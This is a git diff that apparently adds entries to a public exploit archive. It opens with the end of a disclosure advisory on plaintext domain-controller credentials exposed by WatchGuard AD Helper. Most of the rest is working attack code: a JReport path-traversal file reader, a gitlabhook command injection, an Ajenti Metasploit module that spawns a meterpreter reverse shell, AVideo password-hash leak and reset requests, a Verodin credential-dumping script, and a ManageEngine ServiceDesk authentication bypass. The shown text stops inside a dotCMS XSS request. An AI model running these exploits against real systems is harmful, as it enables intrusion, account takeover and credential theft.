+Fixed Versions: 5.8.5.10317
+Vulnerability Type: Information Disclosure
+Security Risk: high
+Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
+Advisory Status: published
+CVE: GENERIC-MAP-NOMATCH
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
+
+
+Introduction
+============
+
+"Threat Detection and Response (TDR) is a cloud-based subscription
+service that integrates with your Firebox to minimize the consequences
+of data breaches and penetrations through early detection and automated
+remediation of security threats."
+
+"Threat Detection and Response includes the AD Helper component. If your
+network has an Active Directory server, you can install AD Helper to
+manage automated installation and updates of Host Sensors on your
+network."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+By accessing the AD Helper's web interface, it was discovered that a
+call to an API endpoint is made, which responds with plaintext
+credentials to all configured domain controllers. There is no
+authentication needed to use the described interface and the
+installation instructions at [1] contain no indication of any way to
+configure access control.
+
+
+Proof of Concept
+================
+
+An HTTP GET request to the path "/domains/list" of the AD Helper
+API returns, among others, the plaintext credentials to
+all configured Windows domain controllers:
+
+------------------------------------------------------------------------
+$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
+
+{
+  "content": [
+    {
+      "id": 1,
+      "fullyQualifiedName": "example.com",
+      "logonDomain": "example.com",
+      "domainControllers": "dc1.example.com",
+      "username": "[DOMAIN_USER]",
+      "password": "[DOMAIN_PASSWORD]",
+      "uuid": "[...]",
+      "servers": [
+        {
+          [...]
+        }
+      ]
+    }
+  ],
+  "totalPages": 1,
+  "totalElements": 1,
+  "number": 0,
+  "numberOfElements": 1
+}
+------------------------------------------------------------------------
+
+The same request and its response can be observed when initially accessing
+the web interface. The discovered version of AD Helper responds with
+the following server banner:
+
+------------------------------------------------------------------------
+jetty(winstone-5.8.5.10233-9.4.12.v20180830)
+------------------------------------------------------------------------
+
+It is likely that other versions of the AD Helper Component are
+vulnerable as well.
+
+
+Workaround
+==========
+
+Ensure API of the AD Helper Component is not reachable over the network,
+for example by putting it behind a Firewall.
+
+
+Fix
+===
+
+Update to Version 5.8.5.10317 or later.
+
+
+Security Risk
+=============
+
+No authentication is needed to access AD Helper's web interface and the
+installation instructions at [1] describe that configured domain user
+accounts must possess at least the following privileges:
+
+ * Connect to the host
+ * Mount the share ADMIN$
+ * Create a file on the host
+ * Execute commands on the host
+ * Install software on the host
+
+Access to the "ADMIN$" share implies a user with administrative
+privileges. Therefore, this vulnerability poses a high risk.
+
+
+Timeline
+========
+
+2020-02-12 Vulnerability identified
+2020-02-19 Customer approved disclosure to vendor
+2020-02-24 Tried to contact the German branch of WatchGuard
+2020-02-27 Contacted the Dutch branch of WatchGuard
+2020-02-28 Contact to ADHelper QA Team Lead established
+2020-03-02 Advisory draft sent for verification
+2020-03-10 Vendor released fixed version and blog post
+2020-03-11 CVE ID requested
+2020-03-11 Advisory released
+
+
+References
+==========
+
+[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
\ No newline at end of file
diff --git a/exploits/java/webapps/48260.py b/exploits/java/webapps/48260.py
new file mode 100755
index 000000000..bef4af3a7
--- /dev/null
+++ b/exploits/java/webapps/48260.py
@@ -0,0 +1,91 @@
+# Exploit Title: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal
+# Date: 2020-03-26
+# Exploit Author: hongphukt
+# Vendor Homepage: https://www.jinfonet.com/
+# Software Link: https://www.jinfonet.com/product/download-jreport/
+# Version: JReport 15.6
+# Tested on: Linux, Windows 
+
+Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.
+Technical Details
+
+Jreport before loggedin have help function with url:
+
+https://serverip/jreport/sendfile/help/userguide/server/index.htm
+
+senfile url processing by jet.server.servlets.SendFileServlet class.
+
+            <servlet>
+
+                        <servlet-name>sendfile</servlet-name>
+
+                        <servlet-class>jet.server.servlets.SendFileServlet</servlet-class>
+
+            </servlet>
+
+            <servlet-mapping>
+
+                        <servlet-name>sendfile</servlet-name>
+
+                        <url-pattern>/sendfile/*</url-pattern>
+
+            </servlet-mapping>
+
+ 
+
+In jet.server.servlets.SendFileServlet class, request will go on when it’s authenticated or start url by ‘/help/’
+
+if ((!isAuthentic) &&
+
+        (!path.startsWith("/help/")))
+
+      {
+
+        httpRptServer.getHttpUserSessionManager().sendUnauthorizedResponse(req, res, this.D, httpRptServer.getResourceManager().getRealm());
+
+        return;
+
+      }
+
+ 
+
+So the function reading file without any path validation
+
+Exploit:
+
+Get login properties, /etc/password file by get url:
+
+ http://jreport.test/jreport/sendfile/help/../bin/login.properties
+
+ http://jreport.test/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd
+
+# Exploit Code
+
+import requests
+import argparse
+
+def exploit(url, file):
+    
+    session = requests.Session()
+    rawBody = "\r\n"
+    response = session.get("{}/jreport/sendfile/help/{}".format(url,file), data=rawBody)
+
+    if response.status_code == 404:
+        print("The '{}' file was not found.".format(file))	
+    else:
+        print("-" *22)
+        print(response.content)
+        print("-" *22)
+
+if __name__ == "__main__":
+
+    parser = argparse.ArgumentParser(description='Jreport Path traversal & Arbitrary File Download')
+    parser.add_argument('-u', action="store", dest="url", required=True, help='Target URL')
+    parser.add_argument('-f', action="store", dest="file", required=True, help='The file to download')
+    args = parser.parse_args()
+
+    exploit(args.url, args.file)
+
+# python jreport_fileread.py -u http://jreport.address -f "../../../../../../../../../../../../../../etc/passwd/"
+# python jreport_fileread.py -u http://jreport.address -f "../bin/login.properties"
+# python jreport_fileread.py -u http://jreport.address -f "../bin/server.properties"
\ No newline at end of file
diff --git a/exploits/json/webapps/47420.txt b/exploits/json/webapps/47420.txt
new file mode 100644
index 000000000..19dd79474
--- /dev/null
+++ b/exploits/json/webapps/47420.txt
@@ -0,0 +1,18 @@
+# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
+# Date: 2019-09-13
+# Exploit Author: Semen Alexandrovich Lyhin
+# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
+# Version: 0.0.17
+# Tested on: Kali Linux 2, Windows 10. 
+# CVE : CVE-2019-5485
+
+#!/usr/bin/python
+
+import requests
+
+target = "http://TARGET:3420"
+cmd = r"touch /tmp/poc.txt"
+json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
+r = requests.post(target, json)
+
+print "Done."
\ No newline at end of file
diff --git a/exploits/json/webapps/47560.rb b/exploits/json/webapps/47560.rb
new file mode 100755
index 000000000..cf1b345c6
--- /dev/null
+++ b/exploits/json/webapps/47560.rb
@@ -0,0 +1,85 @@
+# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit)
+# Date: 2019-10-29
+# Exploit Author: Onur ER
+# Vendor Homepage: http://ajenti.org/
+# Software Link: https://github.com/ajenti/ajenti
+# Version: 2.1.31
+# Tested on: Ubuntu 19.10
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'            => "Ajenti 2.1.31 Remote Code Execution",
+                      'Description'     => %q{
+                        This module exploits a command injection in Ajenti <= 2.1.31.
+                        By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
+                      },
+                      'Author'          => [
+                          'Jeremy Brown', # Vulnerability discovery
+                          'Onur ER <onur@onurer.net>' # Metasploit module
+                      ],
+                      'References'      => [
+                          ['EDB', '47497']
+                      ],
+                      'DisclosureDate'  => '2019-10-14',
+                      'License'         => MSF_LICENSE,
+                      'Platform'        => 'python',
+                      'Arch'            => ARCH_PYTHON,
+                      'Privileged'      => false,
+                      'Targets'         => [
+                          [ 'Ajenti <= 2.1.31', {} ]
+                      ],
+                      'DefaultOptions'  =>
+                          {
+                              'RPORT'   => 8000,
+                              'SSL'     => 'True',
+                              'payload' => 'python/meterpreter/reverse_tcp'
+                          },
+                      'DefaultTarget'   => 0
+          ))
+    register_options([
+                         OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+                               'method' => 'GET',
+                               'uri'    => "/view/login/normal"
+                           })
+    if res and res.code == 200
+      if res.body =~ /'ajentiVersion', '2.1.31'/
+        return Exploit::CheckCode::Vulnerable
+      elsif res.body =~ /Ajenti/
+        return Exploit::CheckCode::Detected
+      end
+    end
+    vprint_error("Unable to determine due to a HTTP connection timeout")
+    return Exploit::CheckCode::Unknown
+  end
+
+
+  def exploit
+    print_status("Exploiting...")
+    random_password = rand_text_alpha_lower(7)
+    json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
+                  'password' => random_password,
+                  'mode' => 'normal'
+    }
+    res = send_request_cgi({
+         'method' => 'POST',
+         'uri'    => normalize_uri(target_uri, 'api', 'core', 'auth'),
+         'ctype'  => 'application/json',
+         'data'   => JSON.generate(json_body)
+     })
+  end
+end
\ No newline at end of file
diff --git a/exploits/json/webapps/47997.txt b/exploits/json/webapps/47997.txt
new file mode 100644
index 000000000..5ab9a9567
--- /dev/null
+++ b/exploits/json/webapps/47997.txt
@@ -0,0 +1,41 @@
+# Exploit Title: AVideo Platform 8.1 - Information Disclosure (User Enumeration)
+# Dork: N/A
+# Date: 2020-02-05
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://avideo.com
+# Software Link: https://github.com/WWBN/AVideo
+# Version: 8.1
+# Tested on: Linux
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
+# 
+................
+0	
+id	92
+user	"admin"
+name	"Watch Later"
+email	"user@localhost"
+password	"bc79a173cc20f0897db1c5b004588db9"
+created	"2019-05-16 21:42:42"
+modified	"2019-05-16 21:42:42"
+isAdmin	1
+status	"watch_later"
+photoURL	"videos/userPhoto/photo1.png"
+lastLogin	"2020-02-03 08:11:08"
+recoverPass	"0ce70c7b006c78552fee993adeaafadf"
+................
+# 
+# Hash function to be converted ....
+# 
+function encryptPassword($password, $noSalt = false) {
+    global $advancedCustom, $global, $advancedCustomUser;
+    if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {
+        $password .= $global['salt'];
+    }
+
+    return md5(hash("whirlpool", sha1($password)));
+}
+#
\ No newline at end of file
diff --git a/exploits/json/webapps/48002.py b/exploits/json/webapps/48002.py
new file mode 100755
index 000000000..f09ff4afd
--- /dev/null
+++ b/exploits/json/webapps/48002.py
@@ -0,0 +1,187 @@
+#  Exploit Title: Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)
+#  Discovery Date: 2019-01-31
+#  Exploit Author: Nolan B. Kennedy (nxkennedy)
+#  Vendor Homepage: https://www.verodin.com/
+#  Software Link : https://www.verodin.com/demo-request/demo-request-form
+#  Tested Versions: v3.5.1.0, v3.5.2.0, v3.5.3.1
+#  Tested On: Windows
+#  CVE: CVE-2019-10716
+#  Vulnerability Type: Sensitive Data Disclosure
+###
+# Description: Verodin Director's REST API allows authenticated users to query the configuration
+#       details, which include credentials, of any 50+ possible integrated security tools (e.g. Splunk, ArcSight, Palo Alto, AWS Cloud Trail).
+#       Fortunately for attackers, members of 3 out of the 4 user groups in the Director can query this info (Users, Power Users, System Admin). 
+#
+#       API Request: GET https://<director-ip>/integrations.json
+#
+# Usage: python3 script.py
+#
+# Example Output:
+#
+#       -- VERODIN DIRECTOR WEB CONSOLE < V3.5.4.0 - REMOTE AUTHENTICATED PASSWORD DISCLOSURE (POC) --
+#	-- Author: Nolan B. Kennedy (nxkennedy) --
+#
+#
+#       [+] Director Version
+#       =====================
+#       [*] Detected version 3.5.1.0 is VULNERABLE! :)
+#
+#
+#       [+] Account Permissions
+#       ========================
+#       [*] "admin@verodin.com" is a member of "System Admin"
+#
+#
+#       [+] Verodin Integrations
+#       =========================
+#       [*] Product: splunk
+#       [*] Username: splunk_svc_acct
+#       [*] Misc (may include credentials): [{'scheme': 'https', 'basic': False, 'password': 'Sup3rP@ssw0rd',
+#       'port': 8089, 'host': '10.0.0.6', 'username': 'splunk_svc_acct'},
+#       {'proxy_hash': None}]
+#
+#       [*] Product: arcsight
+#       [*] Username: arcsight_admin
+#       [*] Misc (may include credentials): ['10.0.0.7', 8443, 'https', 'arcsight_admin', 'Sup3rP@ssw0rd',
+#       "/All Filters/Personal/integration_user's filters/Verodin Filter", 'Verodin Query Viewer', 60]
+#
+#       [+] Done!
+###
+
+import base64
+from distutils.version import LooseVersion
+import json
+import re
+import ssl
+from sys import exit
+from time import sleep
+import urllib.request
+
+
+
+
+verodin_ip = '0.0.0.0'
+# Default System Admin creds. Worth a try.
+username = 'admin@verodin.com'
+password = 'Ver0d!nP@$$'
+base_url = 'https://{}'.format(verodin_ip)
+fixed_version = '3.5.4.0'
+
+
+# We'll be making 3 different requests so we need a web handling function
+def requests(target, html=False):
+
+        url = base_url + target
+        context = ssl._create_unverified_context() # so we don't get an ssl cert error
+        req  = urllib.request.Request(url)
+        credentials = ('{}:{}'.format(username, password))
+        encoded_credentials = base64.b64encode(credentials.encode('ascii'))
+        req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii")) # use %s instead of format because errors
+        r = urllib.request.urlopen(req, context=context)
+        content = r.read().decode('utf-8')
+        if r.getcode() == 200:
+                # we don't always get a 401 if auth fails
+                if 'Cookies need to be enabled' in content: 
+                        print('[!] Failed to retrieve data: Credentials incorrect/invalid')
+                        print()
+                        print('[!] Exiting...')
+                        exit(1)
+                elif html:
+                        blob = content
+                else:
+                        blob = json.loads(content)
+                return blob
+        elif r.getcode() == 401:
+                print('[!] Failed to retrieve data: Credentials incorrect/invalid')
+                print()
+                print('[!] Exiting...')
+                exit(1)
+        else:
+                print('[!] ERROR: Status Code {}'.format(r.getcode()))
+                exit(1)
+                
+
+# Do we have permissions to retrieve the creds? 
+def getUserPerms():
+
+	target = '/users/user_prefs.json'
+	r = requests(target) # returns a single json dict
+	print('\n[+] Account Permissions')
+	print('========================')
+	group_id = r['user_group_id']
+	roles = {'Reporting': 4, 'Users': 3, 'Power Users': 2, 'System Admin': 1}
+	for role,value in roles.items():
+		if group_id == value:
+			print('[*] "{}" is a member of "{}"'.format(username, role))
+			print()
+			if group_id == 4:
+				print('[!] This account does not have sufficient privs. You need "Users" or higher.')
+				print()
+				print('[!] Exiting...')
+				exit(1)
+	sleep(0.5)
+	
+
+# We need to verify the target Director is running a vulnerable version
+def checkVuln():
+
+	target = '/settings/system'
+	r = requests(target, html=True)
+	field = re.search(r'Director\sVersion:.*', r)
+	version = field.group().split('<')[0].split(" ")[2]
+	print('\n[+] Director Version')
+	print('=====================')
+	if LooseVersion(version) < LooseVersion(fixed_version):
+		print('[*] Detected version {} is VULNERABLE! :)'.format(version))
+		print()
+	else:
+		print('[!] Detected version {} is not vulnerable. Must be < {}'.format(version, fixed_version))
+		print()
+		print('[!] Exiting...') 
+
+	sleep(0.5)
+	
+
+# Where we parse out any creds or other useful info 
+def getLoot():
+
+        target = '/integrations.json'
+        r = requests(target)  # a list of json dicts
+        print('\n[+] Verodin Integrations')
+        print('=========================')
+        if not r:
+                print('[+] Dang! No integrations configured in this Director :(')
+                print()
+        else:
+                for integration in r:
+                        product = integration['package_name'] # constant key
+                        misc = integration.get('new_client_args') # we use .get to return a None type if the key doesn't exist
+                        user = integration.get('username')
+                        passw = integration.get('password')
+                        token = integration.get('auth_token')
+                        print('[*] Product: {}'.format(product))
+                        if user:
+                                print('[*] Username: {}'.format(user))
+                        if passw:
+                                print('[*] Password: {}'.format(passw))
+                        if token and token is not 'null':
+                                print('[*] Auth Token: {}'.format(token))
+                        if misc:
+                                print('[*] Misc (may include credentials): {}'.format(misc))
+                        print()
+        sleep(0.5)
+
+
+def main():
+
+	print('\n-- Verodin Director Web Console < v3.5.4.0 - Remote Authenticated Password Disclosure (PoC) --'.upper())
+	print('-- Author: Nolan B. Kennedy (nxkennedy) --')
+	print()
+	checkVuln()
+	getUserPerms()
+	getLoot()
+	print('[+] Done!')
+			
+		
+if __name__ == '__main__':
+	main()
\ No newline at end of file
diff --git a/exploits/json/webapps/48003.txt b/exploits/json/webapps/48003.txt
new file mode 100644
index 000000000..95572564e
--- /dev/null
+++ b/exploits/json/webapps/48003.txt
@@ -0,0 +1,33 @@
+# Exploit Title: AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)
+# Dork: N/A
+# Date: 2020-02-05
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://avideo.com
+# Software Link: https://github.com/WWBN/AVideo
+# Version: 8.1
+# Tested on: Linux
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
+# 
+................
+0	
+id	92
+user	"admin"
+name	"Watch Later"
+email	"user@localhost"
+password	"bc79a173cc20f0897db1c5b004588db9"
+created	"2019-05-16 21:42:42"
+modified	"2019-05-16 21:42:42"
+isAdmin	1
+status	"watch_later"
+photoURL	"videos/userPhoto/photo1.png"
+lastLogin	"2020-02-03 08:11:08"
+recoverPass	"0ce70c7b006c78552fee993adeaafadf"
+................
+#
+# Password recovery can be done using recoverPass.
+# http://localhost/[PATH]/recoverPass?user=admin&recoverpass=0ce70c7b006c78552fee993adeaafadf
+#
\ No newline at end of file
diff --git a/exploits/jsp/webapps/46659.py b/exploits/jsp/webapps/46659.py
new file mode 100755
index 000000000..afbc13cad
--- /dev/null
+++ b/exploits/jsp/webapps/46659.py
@@ -0,0 +1,193 @@
+#!/usr/bin/python
+
+# Exploit Title: Manage Engine ServiceDesk Plus Version <10.0 Privilege Escalation
+# Date: 30-03-2019
+# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız
+# Vendor: ManageEngine
+# Vendor Homepage: www.manageengine.com
+# Product: Service Desk Plus
+# Version: 10.0
+# Tested On: Kali Linux
+# CVE: CVE-2019-10008
+# Platform: JSP
+
+# Timeline
+
+# 22 march 2019: Discovery
+# 24 march 2019: CVE id reserved for CVE-2019-10008
+# 26 march 2019: First contact with vendor
+# 5  april 2019: First publication
+# 10 april 2019: Vendor confirmation
+# 11 april 2019: Vendor released a fix (version 10017)
+
+
+# Reference link: https://www.manageengine.com/products/service-desk/readme.html
+
+import os
+import re
+
+
+
+# How to use: Change the host, low_username, low_password and high_username variables depending on what you have.
+# Low username and password is an account you have access to. high_username is account you want to authenticate as.
+
+# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password.
+
+
+#Host ip address + port
+host="localhost:8080"
+
+#set to https if needed
+url = "http://" + host
+
+#Username with credentials you have
+low_username="guest"
+low_password="guest"
+
+#username you want to login as
+high_username="administrator"
+
+print("\033[1;37mUrl: \033[1;32m" + url)
+print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)
+print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)
+
+
+print("\033[1;32mGetting a session id\033[1;37m")
+
+# Get index page to capture a session id
+curl = "curl -i -s -k  -X $'GET' \
+    -H $'Host: "+host+"'  -H $'Referer: "+url+"/' -H $'Connection: close'\
+    $'"+url+"/'"
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+
+print("Sessid:")
+print(sessid)
+
+
+print("\033[1;31mLogging in with low privilege user\033[1;37m")
+
+
+#Attempt login post request 
+curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\
+ -H $'Referer: "+url+"/'\
+ -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
+ -b $'JSESSIONID="+sessid+"' \
+ --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\
+ hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\
+ dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \
+ $'"+url+"/j_security_check'"
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+
+#Instead of following redirects with -L, following manually because we don't need all the transactions.
+curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\
+ -H $'Referer: "+url+"/'\
+ -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
+ -b $'JSESSIONID="+sessid+"' \
+ $'"+url+"/'"
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+print("\033[1;32mCaptured authenticated cookies.\033[1;37m")
+sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+print(sessid)
+sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
+print(sessidsso)
+grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)
+
+grbl2 = []
+for cookie in grbl:
+	cl = cookie.split('=')
+	if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':
+
+		grbl2.append(cl[0])
+		grbl2.append(cl[1])
+
+curl = "curl -i -s -k -X $'GET' \
+    -H $'Host: "+host+"' \
+    -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    $'"+url+"/mc/'"
+
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+
+print("\033[1;32mCaptured secondary sessid.\033[1;37m")
+print(sessid2)
+
+
+print("\033[1;31mDoing the magic step 1.\033[1;37m")
+curl = "curl -i -s -k -X $'GET' \
+    -H $'Host: "+host+"' \
+	-H $'Referer: "+url+"/mc/WOListView.do' \
+	-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+	-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+	$'"+url+"/mc/jsp/MCLogOut.jsp'"
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+print("\033[1;31mDoing the magic step 2.\033[1;37m")
+
+
+
+
+curl = "curl -i -s -k -X $'GET' \
+    -H $'Host: "+host+"' \
+    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    $'"+url+"/mc/jsp/MCDashboard.jsp'"
+
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
+
+
+curl = "curl -i -s -k -X $'GET' \
+    -H $'Host: "+host+"' \
+    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    $'"+url+"/'"
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+
+
+curl = "curl -i -s -k -X $'POST' \
+    -H $'"+host+"' \
+    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
+    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \
+    $'"+url+"/mc/j_security_check'"
+
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+curl = "curl -i -s -k -X $'GET' \
+    -H $'Host: "+host+"' \
+    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
+    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    $'"+url+"/mc/jsp/MCDashboard.jsp'"
+
+
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+
+sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
+
+print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m")
+print("JSESSIONID=" + sessidhigh)
+print("JSESSIONIDSSO=" + sessidssohigh)
+print(grbl2[0] + "=" + grbl2[1])
+print(grbl2[2] + "=" + grbl2[3])
+print("_rem=true")
\ No newline at end of file
diff --git a/exploits/jsp/webapps/46825.txt b/exploits/jsp/webapps/46825.txt
new file mode 100644
index 000000000..a41de9e9d
--- /dev/null
+++ b/exploits/jsp/webapps/46825.txt
@@ -0,0 +1,37 @@
+# Exploit Title: dotCMS 5.1.1 - HTML Injection
+# Date: 2019-05-09 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://dotcms.com/
+# Software Link: https://github.com/dotCMS
+# Software: dotCMS
+# Product Version: 5.1.1
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection and Cross-site Scripting
+# CVE: CVE-2019-11846
+
+# HTTP POST Request :
+
+POST /servlets/ajax_file_upload?fieldName=binary3 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://TARGET/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=site-browser&p_p_action=1&p_p_state=maximized&angularCurrentPortlet=site-browser&p_p_mode=view&_site_browser_struts_action=%2Fext%2Fcontentlet%2Fedit_contentlet&_site_browser_cmd=new&selectedStructure=33888b6f-7a8e-4069-b1b6-5c1aa9d0a48d&folder=SYSTEM_FOLDER&referer=/c/portal/layout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dsite-browser%26p_p_action%3D0%26p_p_state%3Dmaximized%26angularCurrentPortlet%3Dsite-browser%26p_p_mode%3Dview%26_site_browser_struts_action%3D%252Fext%252Fbrowser%252Fview_browser&in_frame=true&frame=detailFrame&container=true&angularCurrentPortlet=site-browser
+Content-Type: multipart/form-data; boundary=---------------------------5890268631313811380287956669
+Content-Length: 101313
+DNT: 1
+Connection: close
+Cookie: messagesUtk=2366e7c3b5af4c8c93bb11d0c994848a; BACKENDID=172.18.0.3; JSESSIONID=65C16EFBEE5B7176B22083A0CA451F0A.c16f6b7d05d9; hs-messages-hide-welcome-message=true; access_token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJkZGFlZmEzNS0yYmMyLTQ4MTEtOTRjNi0xNGE0OTk4YzFkNDAiLCJpYXQiOjE1NTczOTY0NzYsInVwZGF0ZWRfYXQiOjEyMDQ4MjQ5NjEwMDAsInN1YiI6ImRvdGNtcy5vcmcuMSIsImlzcyI6IjRiNTkyYjIyLTBiMmEtNGI2ZC05NmU4LTdjMzBiMzgzOTM1ZiJ9.F8_L_Cu96pkYcwTl4ex_zfrA-Fk-rqNUz24oCV0gOmc; DWRSESSIONID=EZToDkzmi*mMXCayMxskFA75sGm
+Upgrade-Insecure-Requests: 1
+
+-----------------------------5890268631313811380287956669
